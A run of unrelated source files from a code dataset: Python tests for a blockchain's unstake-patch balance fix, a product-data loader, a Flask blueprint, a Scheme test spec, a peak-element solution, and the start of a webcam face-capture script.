            self.assertEqual(CoinPartFlag.NONE, flag)
            self.assertGreaterEqual(len(unstakes_info), 1)
            expired_unstake = 0
            for j, unstake_info in enumerate(expired_unstakes_info):
                expired_unstake += unstake_info[0]
                self.assertEqual(unstake_info[0], unstakes_info[j][0])
                self.assertEqual(unstake_info[1], unstakes_info[j][1])
            self.assertEqual(expired_icx, expired_unstake)

    def _check_expired_icx_release(self, account_count: int = 1):
        for i in range(account_count):
            get_stake_info: dict = self.get_stake(self._accounts[i])
            self.assertNotIn("unstakes", get_stake_info)
            db_info: dict = self._get_account_info(self._accounts[i])
            unstakes_info: list = db_info["stake"]._unstakes_info
            flag: CoinPartFlag = db_info["coin"].flags
            self.assertEqual(CoinPartFlag.NONE, flag)
            self.assertEqual(0, len(unstakes_info))
    def test_fix_bug_rev11_all_success(self):
        account_count: int = 5
        initial_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP
        unstakes_info_per_account: list = self._setup(
            init_balance=initial_balance,
            stake=stake,
            account_count=account_count
        )

        # delegation
        expired_icx: int = stake
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_delegation_tx(
                from_=self._accounts[i],
                origin_delegations=[
                    (
                        self._accounts[i],
                        0
                    )
                ]
            )
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - fee + expired_icx
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))

        # check expired_icx 1
        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstakes_info = [expired_unstake]
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstakes_info,
            account_count=account_count
        )

        src: list = []
        for i in range(account_count):
            db_info: dict = self._get_account_info(self._accounts[i])
            stake_part: 'StakePart' = db_info["stake"]
            data: dict = {
                "address": str(self._accounts[i].address),
                "total_unstake": stake_part._stake + stake_part._total_unstake(),
                "old_unstake_format": False,
                "unstakes": [
                    [
                        stake_part._unstakes_info[0][0],
                        stake_part._unstakes_info[0][1]
                    ],
                ]
            }
            src.append(data)

        targets: List[Target] = [Target.from_dict(i) for i in src]
        patcher = UnstakePatcher(targets=targets)
        with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
            from_path_mock.return_value = patcher
            self.set_revision(Revision.FIX_BALANCE_BUG.value)

        self._check_expired_icx_release(account_count=account_count)

        # Retry
        # sync balance
        for i in range(account_count):
            self._accounts[i].balance = self.get_balance(self._accounts[i])

        # set stake
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_stake_tx(from_=self._accounts[i], value=stake)
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - stake - fee
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
            self._accounts[i].balance = expected_balance

        # Balance | Stake   | UnStake | Expired_icx
        # 50 icx  | 100 icx | 0 icx   | 0 icx

        # unstake (unstake_count - 1) times; with a single unstake step this
        # degenerate loop never runs (kept from the generic _setup flow)
        tx_list = []
        unstake = stake // 1
        for i in range(1 - 1):
            for j in range(account_count):
                unstake_value = (i + 1) * unstake
                tx = self.create_set_stake_tx(from_=self._accounts[j], value=stake - unstake_value)
                tx_list.append(tx)
            tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
            for j in range(account_count):
                fee = tx_results[j + 1].step_used * tx_results[j + 1].step_price
                expected_balance = self._accounts[j].balance - fee
                self.assertEqual(expected_balance, self.get_balance(self._accounts[j]))
                self._accounts[j].balance = expected_balance

        # unstake all staked value
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_stake_tx(from_=self._accounts[i], value=0)
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - fee
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
            self._accounts[i].balance = expected_balance

        # Balance | Stake | UnStake | Expired_icx
        # 50 icx  | 0 icx | 100 icx | 0 icx

        # wait expire unstake
        remaining_blocks = 0
        rets = []
        for i in range(account_count):
            unstakes_info: list = self.get_stake(self._accounts[i]).get("unstakes")
            rets.append(unstakes_info)
            unstake_info = unstakes_info[-1]
            remaining_blocks = unstake_info["remainingBlocks"]
        self.make_empty_blocks(remaining_blocks + 1)

        # delegation
        expired_icx: int = stake
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_delegation_tx(
                from_=self._accounts[i],
                origin_delegations=[
                    (
                        self._accounts[i],
                        0
                    )
                ]
            )
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - fee + expired_icx
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))

        # check expired_icx 1
        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        self._check_expired_icx_release(account_count=account_count)
    def test_fix_bug_rev11_all_success2(self):
        account_count: int = 5
        initial_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP
        unstakes_info_per_account: list = self._setup(
            init_balance=initial_balance,
            stake=stake,
            account_count=account_count
        )

        # delegation
        expired_icx: int = stake
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_delegation_tx(
                from_=self._accounts[i],
                origin_delegations=[
                    (
                        self._accounts[i],
                        0
                    )
                ]
            )
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - fee + expired_icx
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))

        # check expired_icx 1
        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstakes_info = [expired_unstake]
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstakes_info,
            account_count=account_count
        )

        src: list = []
        for i in range(account_count):
            db_info: dict = self._get_account_info(self._accounts[i])
            stake_part: 'StakePart' = db_info["stake"]
            data: dict = {
                "address": str(self._accounts[i].address),
                "total_unstake": stake_part._stake + stake_part._total_unstake(),
                "old_unstake_format": False,
                "unstakes": [
                    [
                        stake_part._unstakes_info[0][0],
                        stake_part._unstakes_info[0][1]
                    ],
                ]
            }
            src.append(data)

        targets: List[Target] = [Target.from_dict(i) for i in src]
        patcher = UnstakePatcher(targets=targets)
        with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
            from_path_mock.return_value = patcher
            self.set_revision(Revision.FIX_BALANCE_BUG.value)

        self._check_expired_icx_release(account_count=account_count)
    def test_fix_bug_rev11_all_fail(self):
        account_count: int = 5
        initial_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP
        unstakes_info_per_account: list = self._setup(
            init_balance=initial_balance,
            stake=stake,
            account_count=account_count
        )

        # delegation
        expired_icx: int = stake
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_delegation_tx(
                from_=self._accounts[i],
                origin_delegations=[
                    (
                        self._accounts[i],
                        0
                    )
                ]
            )
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - fee + expired_icx
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))

        # check expired_icx 1
        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstakes_info = [expired_unstake]
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstakes_info,
            account_count=account_count
        )

        src: list = []
        for i in range(account_count):
            db_info: dict = self._get_account_info(self._accounts[i])
            stake_part: 'StakePart' = db_info["stake"]
            data: dict = {
                "address": str(self._accounts[i].address),
                "total_unstake": stake_part._stake + stake_part._total_unstake(),
                "old_unstake_format": False,
                "unstakes": [
                    [
                        stake_part._unstakes_info[0][0] - 1,
                        stake_part._unstakes_info[0][1]
                    ],
                ]
            }
            src.append(data)

        targets: List[Target] = [Target.from_dict(i) for i in src]
        patcher = UnstakePatcher(targets=targets)
        with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
            from_path_mock.return_value = patcher
            self.set_revision(Revision.FIX_BALANCE_BUG.value)
class TestIISSUnStake3(TestIISSBase):
    def test_old_format1(self):
        self.init_decentralized()
        self.init_inv()

        init_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP

        # gain 150 icx
        self.distribute_icx(
            accounts=self._accounts[:1],
            init_balance=init_balance
        )
        self._accounts[0].balance = init_balance
        # Balance | Stake | UnStake | Expired_icx
        # 150 icx | 0 icx | 0 icx   | 0 icx

        # set stake
        expired_icx: int = stake
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - stake - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance
        # Balance | Stake   | UnStake | Expired_icx
        # 50 icx  | 100 icx | 0 icx   | 0 icx

        # unstake all staked value
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        res: dict = self.get_stake(self._accounts[0])
        remaining_blocks: int = res["remainingBlocks"]
        unstake_block_height: int = res["unstakeBlockHeight"]
        self.make_empty_blocks(remaining_blocks + 1)
        # Balance | Stake | UnStake    | Expired_icx
        # 50 icx  | 0 icx | 100 icx(e) | 100 icx

        self.set_revision(Revision.MULTIPLE_UNSTAKE.value)

        # old format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        self.assertEqual(expired_icx, stake_part._unstake)
        self.assertEqual(unstake_block_height, stake_part._unstake_block_height)

        tx_results: List["TransactionResult"] = self.set_delegation(
            from_=self._accounts[0],
            origin_delegations=[
                (
                    self._accounts[0],
                    0
                )
            ]
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee + expired_icx
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # old format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        self.assertEqual(expired_icx, stake_part._unstake)
        self.assertEqual(unstake_block_height, stake_part._unstake_block_height)

        # Check Fix logic
        data: list = [
            {
                "address": str(self._accounts[0].address),
                "total_unstake": stake_part._stake + stake_part._total_unstake(),
                "old_unstake_format": True,
                "unstakes": [
                    [
                        stake_part._unstake,
                        stake_part._unstake_block_height
                    ],
                ]
            },
        ]
        targets: List[Target] = [Target.from_dict(i) for i in data]
        patcher = UnstakePatcher(targets=targets)
        with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
            from_path_mock.return_value = patcher
            self.set_revision(Revision.FIX_BALANCE_BUG.value)

        self._check_unstake_patch()
    def test_new_format(self):
        self.init_decentralized()
        self.init_inv()

        init_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP

        # gain 150 icx
        self.distribute_icx(
            accounts=self._accounts[:1],
            init_balance=init_balance
        )
        self._accounts[0].balance = init_balance
        # Balance | Stake | UnStake | Expired_icx
        # 150 icx | 0 icx | 0 icx   | 0 icx

        # set stake
        expired_icx: int = stake
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - stake - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance
        # Balance | Stake   | UnStake | Expired_icx
        # 50 icx  | 100 icx | 0 icx   | 0 icx

        self.set_revision(Revision.MULTIPLE_UNSTAKE.value)

        # unstake all staked value
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        res: dict = self.get_stake(self._accounts[0])
        remaining_blocks: int = res["unstakes"][0]["remainingBlocks"]
        unstake_block_height: int = res["unstakes"][0]["unstakeBlockHeight"]
        self.make_empty_blocks(remaining_blocks + 1)
        # Balance | Stake | UnStake    | Expired_icx
        # 50 icx  | 0 icx | 100 icx(e) | 100 icx

        # new format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        self.assertEqual(expired_icx, stake_part._unstakes_info[0][0])
        self.assertEqual(unstake_block_height, stake_part._unstakes_info[0][1])

        tx_results: List["TransactionResult"] = self.set_delegation(
            from_=self._accounts[0],
            origin_delegations=[
                (
                    self._accounts[0],
                    0
                )
            ]
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee + expired_icx
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # new format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        self.assertEqual(expired_icx, stake_part._unstakes_info[0][0])
        self.assertEqual(unstake_block_height, stake_part._unstakes_info[0][1])

        data: list = [
            {
                "address": str(self._accounts[0].address),
                "total_unstake": stake_part._stake + stake_part._total_unstake(),
                "old_unstake_format": False,
                "unstakes": [
                    [
                        stake_part._unstakes_info[0][0],
                        stake_part._unstakes_info[0][1]
                    ],
                ]
            },
        ]
        targets: List[Target] = [Target.from_dict(i) for i in data]
        patcher = UnstakePatcher(targets=targets)
        with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
            from_path_mock.return_value = patcher
            self.set_revision(Revision.FIX_BALANCE_BUG.value)

        self._check_unstake_patch()
    def test_new_format_multi_1_of_2_expired(self):
        self.init_decentralized()
        self.init_inv()

        init_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP

        # gain 150 icx
        self.distribute_icx(
            accounts=self._accounts[:1],
            init_balance=init_balance
        )
        self._accounts[0].balance = init_balance
        # Balance | Stake | UnStake | Expired_icx
        # 150 icx | 0 icx | 0 icx   | 0 icx

        # set stake
        expired_icx: int = stake // 2
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - stake - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance
        # Balance | Stake   | UnStake | Expired_icx
        # 50 icx  | 100 icx | 0 icx   | 0 icx

        self.set_revision(Revision.MULTIPLE_UNSTAKE.value)

        # unstake 1/2 of staked value
        unstake = stake // 2
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=unstake)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # make empty some blocks for term between unstakes
        self.make_empty_blocks(5)

        # unstake the rest of staked value
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        res: dict = self.get_stake(self._accounts[0])
        unstakes_info = res["unstakes"]
        first_slot_remaining: int = unstakes_info[0]["remainingBlocks"]
        self.make_empty_blocks(first_slot_remaining + 1)
        # Balance | Stake | UnStake   | Expired_icx
        # 50 icx  | 0 icx | 50 icx(e) | 50 icx

        # new format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        expired_unstake = 0
        current_block = self.get_last_block().height
        for i, unstake_info in enumerate(stake_part._unstakes_info):
            self.assertEqual(unstakes_info[i]["unstakeBlockHeight"], unstake_info[1])
            if unstake_info[1] < current_block:
                expired_unstake += unstake_info[0]
        self.assertEqual(expired_icx, expired_unstake)

        tx_results: List["TransactionResult"] = self.set_delegation(
            from_=self._accounts[0],
            origin_delegations=[
                (
                    self._accounts[0],
                    0
                )
            ]
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee + expired_icx
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # new format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        expected_expired_icx = stake_part._unstakes_info[0][0]
        self.assertEqual(expected_expired_icx, expired_icx)
        self.assertEqual(1, len(stake_part._unstakes_info))
        self.assertEqual(expired_icx, stake_part._unstakes_info[0][0])
        self.assertEqual(unstakes_info[-1]["unstakeBlockHeight"], stake_part._unstakes_info[0][1])

        data: list = [
            {
                "address": str(self._accounts[0].address),
                "total_unstake": stake_part._stake + stake_part._total_unstake(),
                "old_unstake_format": False,
                "unstakes": [
                    [
                        stake_part._unstakes_info[0][0],
                        stake_part._unstakes_info[0][1]
                    ],
                ]
            },
        ]
        targets: List[Target] = [Target.from_dict(i) for i in data]
        patcher = UnstakePatcher(targets=targets)
        with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
            from_path_mock.return_value = patcher
            self.set_revision(Revision.FIX_BALANCE_BUG.value)

        self._check_unstake_patch()
    def test_new_format_multi_2_of_2_expired(self):
        self.init_decentralized()
        self.init_inv()

        init_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP

        # gain 150 icx
        self.distribute_icx(
            accounts=self._accounts[:1],
            init_balance=init_balance
        )
        self._accounts[0].balance = init_balance
        # Balance | Stake | UnStake | Expired_icx
        # 150 icx | 0 icx | 0 icx   | 0 icx

        # set stake
        expired_icx: int = stake
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=stake)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - stake - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance
        # Balance | Stake   | UnStake | Expired_icx
        # 50 icx  | 100 icx | 0 icx   | 0 icx

        self.set_revision(Revision.MULTIPLE_UNSTAKE.value)

        # unstake 1/2 of staked value
        unstake = stake // 2
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=unstake)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # unstake the rest of staked value
        tx = self.create_set_stake_tx(from_=self._accounts[0], value=0)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=[tx])
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        res: dict = self.get_stake(self._accounts[0])
        unstakes_info = res["unstakes"]
        last_slot_remaining: int = unstakes_info[-1]["remainingBlocks"]
        self.make_empty_blocks(last_slot_remaining + 1)
        # Balance | Stake | UnStake    | Expired_icx
        # 50 icx  | 0 icx | 100 icx(e) | 100 icx

        # new format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.HAS_UNSTAKE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        expected_expired_icx = 0
        for i, unstake_info in enumerate(stake_part._unstakes_info):
            self.assertEqual(unstakes_info[i]["unstakeBlockHeight"], unstake_info[1])
            expected_expired_icx += unstake_info[0]
        self.assertEqual(expired_icx, expected_expired_icx)

        tx_results: List["TransactionResult"] = self.set_delegation(
            from_=self._accounts[0],
            origin_delegations=[
                (
                    self._accounts[0],
                    0
                )
            ]
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee + expired_icx
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # new format
        db_info: dict = self._get_account_info(self._accounts[0])
        coin_part: 'CoinPart' = db_info["coin"]
        stake_part: 'StakePart' = db_info["stake"]
        self.assertEqual(CoinPartFlag.NONE, coin_part._flags)
        self.assertEqual(0, stake_part._stake)
        expected_expired_icx = 0
        for i, unstake_info in enumerate(stake_part._unstakes_info):
            self.assertEqual(unstakes_info[i]["unstakeBlockHeight"], unstake_info[1])
            expected_expired_icx += unstake_info[0]
        self.assertEqual(expired_icx, expected_expired_icx)

        data: list = [
            {
                "address": str(self._accounts[0].address),
                "total_unstake": stake_part._stake + stake_part._total_unstake(),
                "old_unstake_format": False,
                "unstakes": [
                    [
                        stake_part._unstakes_info[0][0],
                        stake_part._unstakes_info[0][1]
                    ],
                    [
                        stake_part._unstakes_info[1][0],
                        stake_part._unstakes_info[1][1]
                    ],
                ]
            },
        ]
        targets: List[Target] = [Target.from_dict(i) for i in data]
        patcher = UnstakePatcher(targets=targets)
        with patch.object(UnstakePatcher, 'from_path') as from_path_mock:
            from_path_mock.return_value = patcher
            self.set_revision(Revision.FIX_BALANCE_BUG.value)

        self._check_unstake_patch()
    def _get_account_info(self, account: 'EOAAccount') -> dict:
        c_key: bytes = CoinPart.make_key(account.address)
        value: bytes = self.get_state_db(c_key)
        coin_part: 'CoinPart' = CoinPart.from_bytes(value)
        s_key: bytes = StakePart.make_key(account.address)
        value: bytes = self.get_state_db(s_key)
        state_part: 'StakePart' = StakePart.from_bytes(value)
        return {
            "coin": coin_part,
            "stake": state_part
        }

    def _check_unstake_patch(self):
        get_stake_info: dict = self.get_stake(self._accounts[0])
        self.assertNotIn("unstake", get_stake_info)
        db_info: dict = self._get_account_info(self._accounts[0])
        unstake: int = db_info["stake"]._unstake
        unstake_block_height: int = db_info["stake"]._unstake_block_height
        unstakes_info: list = db_info["stake"]._unstakes_info
        flag: CoinPartFlag = db_info["coin"].flags
        self.assertEqual(CoinPartFlag.NONE, flag)
        self.assertEqual(0, unstake)
        self.assertEqual(0, unstake_block_height)
        self.assertEqual(0, len(unstakes_info))
class TestIISSUnStakePatcher(TestIISSBase):
    PATH = os.path.join(os.path.dirname(__file__), "./invalid_expired_unstakes/test.json")

    def _make_init_config(self) -> dict:
        config: dict = super()._make_init_config()
        config[ConfigKey.INVALID_EXPIRED_UNSTAKES_PATH] = self.PATH
        return config

    def test_loader(self):
        self.init_decentralized()
        self.init_inv()
        self.set_revision(Revision.FIX_BALANCE_BUG.value)

        expected_data: dict = {
            "block_height": 100,
            "target_count": 3,
            "total_unstake": 50000,
            "targets": [
                {
                    "address": "hx001977f6b796a8f0e9c6b6ce3ae1c1a6851099e4",
                    "total_unstake": 20000,
                    "old_unstake_format": False,
                    "unstakes": [
                        [10000, 5],
                        [10000, 6]
                    ]
                },
                {
                    "address": "hx00aa98611e6993c907dcd9abf3e6f647fb641229",
                    "total_unstake": 10000,
                    "old_unstake_format": True,
                    "unstakes": [
                        [10000, 10]
                    ]
                },
                {
                    "address": "hx0108a796980c03733ab3809f7a2be80ace2ceef3",
                    "total_unstake": 20000,
                    "old_unstake_format": False,
                    "unstakes": [
                        [10000, 1],
                        [10000, 2]
                    ]
                }
            ]
        }
        with open(self.PATH, "r") as f:
            actual_text = f.read()
        actual_data: dict = json.loads(actual_text)
        self.assertEqual(expected_data, actual_data)
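# Note (added) on the pattern used throughout these tests: UnstakePatcher.from_path
# is patched so that raising the revision to FIX_BALANCE_BUG picks up the
# hand-built Target list instead of reading a report file from disk.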
|
StarcoderdataPython
|
6650557
|
<reponame>DistrictDataLabs/entity-resolution
import os
import csv

import nltk

FIXTURES = os.path.join(os.path.dirname(__file__), "..", "fixtures")
PRODUCTS = os.path.join(FIXTURES, "products")


def load_data(name):
    with open(os.path.join(PRODUCTS, name), 'r') as f:
        reader = csv.DictReader(f)
        for row in reader:
            yield row


if __name__ == '__main__':
    amazon = list(load_data('amazon.csv'))
    google = list(load_data('google.csv'))
    mapping = list(load_data('perfect_mapping.csv'))

    print(len(amazon))
    print(len(google))
    print(len(mapping))
    print(amazon[0].keys())
    print(google[0].keys())
    print(mapping[0].keys())
|
StarcoderdataPython
|
1950649
|
<filename>app/setting/__init__.py
#coding: utf-8
from flask import Blueprint
setting = Blueprint("setting", __name__)
from . import views
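# Note (added): the views import stays below the Blueprint definition on
# purpose; views.py typically imports `setting` back from this package, so
# importing it at the top would create a circular import.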
|
StarcoderdataPython
|
5023762
|
test = {
  'name': 'unique',
  'points': 1,
  'suites': [
    {
      'cases': [
        {
          'code': r"""
          scm> (unique '())
          ()
          scm> (unique '(1 2 1 3 1 4))
          (1 2 3 4)
          scm> (unique '(1 2 3 4))
          (1 2 3 4)
          scm> (unique '(1 1 1 1 1))
          (1)
          scm> (unique '(c a b c))
          (c a b)
          scm> (unique '(1 2 3 4 1 2 3 4 1 2 3 4))
          (1 2 3 4)
          scm> (unique '(a b c a a b b c e c d ))
          (a b c e d)
          """,
          'hidden': False,
          'locked': False
        }
      ],
      'scored': True,
      'setup': r"""
      scm> (load 'hw06)
      """,
      'teardown': '',
      'type': 'scheme'
    }
  ]
}
|
StarcoderdataPython
|
4954506
|
# -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-01-16 10:40:41
# @Last Modified by: 何睿
# @Last Modified time: 2019-01-16 11:21:29
class Solution(object):
    def findPeakElement(self, nums):
        """
        :type nums: List[int]
        :rtype: int
        """
        count = len(nums)
        middle, left, right = 0, 0, count - 1
        while left <= right:
            # take the midpoint
            middle = left + ((right - left) >> 1)
            # ascending here: a larger value lies to the right
            # (excluding the current element)
            if middle < count - 1 and nums[middle] < nums[middle + 1]:
                left = middle + 1
            # descending here: a larger value lies to the left
            # (including the current element)
            if middle < count - 1 and nums[middle] > nums[middle + 1]:
                right = middle
            # stop: we reached a boundary, or the current element is
            # greater than both of its neighbours
            if (middle == 0 or nums[middle] > nums[middle - 1]) and \
                    (middle == count - 1 or nums[middle] > nums[middle + 1]):
                return middle
        return middle
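
if __name__ == "__main__":
    # Added usage example: value 3 at index 2 is a peak.
    print(Solution().findPeakElement([1, 2, 3, 1]))  # -> 2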
|
StarcoderdataPython
|
3291572
|
<gh_stars>0
import csv
import os

import cv2

if not os.path.exists('./dataset'):
    os.makedirs('./dataset')

name = input("enter your name")
roll = input("enter your id")
row = [name, roll, 'A']

# Pick the next numeric subfolder under ./dataset (1 if none exist yet; the
# original indexed l[-1] and crashed on an empty dataset directory).
existing = []
for root, dirs, filenames in os.walk('dataset'):
    for names in dirs:
        existing.append(int(names))
folder = str(max(existing) + 1) if existing else '1'
os.makedirs(f'./dataset/{folder}')


def add(row):
    with open('data.csv', 'a') as f:
        writer = csv.writer(f, lineterminator='\n')
        writer.writerow(row)

# with open('data.csv') as f:
#     data = csv.reader(f)
#     next(data)
#     for names in data:
#         if names[0] == name:
#             print('already exist!!')
#             break
#     else:
#         add(row)
#         print('added')
#     print(names)

capture = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
framecount = 0
flag, image = capture.read()

while True:
    flag, frame = capture.read()
